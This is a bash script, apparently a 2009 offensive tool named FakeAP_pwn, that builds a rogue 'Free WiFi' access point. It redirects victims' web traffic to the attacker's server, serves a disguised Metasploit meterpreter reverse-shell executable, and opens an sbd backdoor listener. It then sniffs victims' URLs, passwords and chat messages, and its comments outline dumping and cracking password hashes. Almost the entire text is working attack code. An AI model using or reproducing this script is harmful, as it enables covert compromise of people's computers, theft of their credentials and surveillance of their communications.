FakeAP_pwn.sh
#! /bin/bash
# (C)opyright 2009 - g0tmi1k
#
# FakeAP_pwn.sh
# Settings
export gatewayip=192.168.1.1
export internet_interface=wlan0
export fakeap_interface=wlan1
echo “[>] Starting: FakeAP_pwn - g0tmi1k”
# FakeAP
echo “[+] Setting up FakeAP”
modprobe tun
xterm -geometry 75x15+1+0 -T FakeAP -e airbase-ng -P -C 30 -e “Free WiFi” $fakeap_interface -v&
sleep 2
# Tables
echo “[+] Setting up forwarding tables…”
ifconfig lo up
ifconfig at0 up
ifconfig at0 10.0.0.1 netmask 255.255.255.0
ifconfig at0 mtu 1400
route add -net 10.0.0.0 netmask 255.255.255.0 gw 10.0.0.1
iptables —flush
iptables —table nat —flush
iptables —delete-chain
iptables —table nat —delete-chain
echo 1 > /proc/sys/net/ipv4/ip_forward
iptables -t nat -A PREROUTING -p udp -j DNAT —to $gatewayip
#iptables -P FORWARD ACCEPT
iptables —append FORWARD —in-interface at0 -j ACCEPT
iptables —table nat —append POSTROUTING —out-interface $internet_interface -j MASQUERADE
# DHCP
echo “[+] Setting up DHCP server…”
xterm -geometry 75x25+1+100 -T DHCP -e dhcpd3 -d -f -cf /root/FakeAP_pwn/dhcpd.conf at0&
sleep 2
# Need the user to come here
echo “[+] Start web server…”
#xterm -geometry 75x25+1+200 -T WebServer -e sh -c “start-apache”&
xterm -geometry 75x25+1+200 -T WebServer -e /etc/init.d/apache2 start
sleep 2
# So lets force them!
echo “[+] Force user to vist our site…”
iptables -t nat -A PREROUTING -p tcp —dport 80 -j DNAT —to 10.0.0.1
# Bad boy stuff!
echo “[+] Here comes metasploit…”
cd /pentest/exploits/framework3
./msfpayload windows/meterpreter/reverse_tcp LHOST=10.0.0.1 X > /var/www/MS016455.exe
echo “[+] Uploading SBD…”
xterm -geometry 75x25+1+300 -T Metasploit -e ./msfcli exploit/multi/handler PAYLOAD=windows/meterpreter/reverse_tcp LHOST=10.0.0.1 AutoRunScript=/root/FakeAP_pwn/fakeap_pwn.rb E&
sleep 2
# upload //root/FakeAP_pwn/ C:/
# execute -f “C:/sbdbg.exe -q -r 10 -k g0tmi1k -e cmd -p 7332 10.0.0.1”
#./msfconsole -r /root/FakeAP_pwn/fakeap_pwn.rc
# Wait till user is connected
rm -r /tmp/FakeAP_pwn.tmp
echo “[-] Waitng for target to connect…”
while [ ! -e /tmp/FakeAP_pwn.tmp ]; do
sleep 1
done
# They give us access to their system, so lets give them internet back ;)
echo “[+] Give them (our) internet back…”
route add -net 10.0.0.0 netmask 255.255.255.0 gw 10.0.0.1
iptables —flush
iptables —table nat —flush
iptables —delete-chain
iptables —table nat —delete-chain
iptables -t nat -A PREROUTING -p udp -j DNAT —to $gatewayip
#iptables -P FORWARD ACCEPT
iptables —append FORWARD —in-interface at0 -j ACCEPT
iptables —table nat —append POSTROUTING —out-interface $internet_interface -j MASQUERADE
# Lets connect! =)
# *** If FakeAP_pwn.rb upload bit is edited, you could replace the line below with VNC! ***
echo “[+] Lets us back in…”
konsole -T BackDoor -e sbd -l -k g0tmi1k -p 7332&
sleep 2
# Get as much info as poss!
echo “[+] Watch what they do…”
# URLs
xterm -geometry 100x10+470+0 -T URLs -e urlsnarf -i wlan0&
# Passwords
xterm -geometry 100x10+470+150 -T Passwords -e dsniff -i wlan0&
# IM Chats
xterm -geometry 100x10+470+300 -T “IM Chat” -e msgsnarf -i wlan0&
echo
echo “[+] DONE - Have you, g0tmi1k?”
# Lets get some stuff from metasploit whistle we are at it!
#sysinfo
#getuid
#use priv
#hashdump > /tmp/FakeAP_pwn-hash.txt
##session -l
##session -i 1
# Lets crack the hash
#cd /pentest/passwords/jtr/
#./john /tmp/FakeAP_pwn-hash.txt
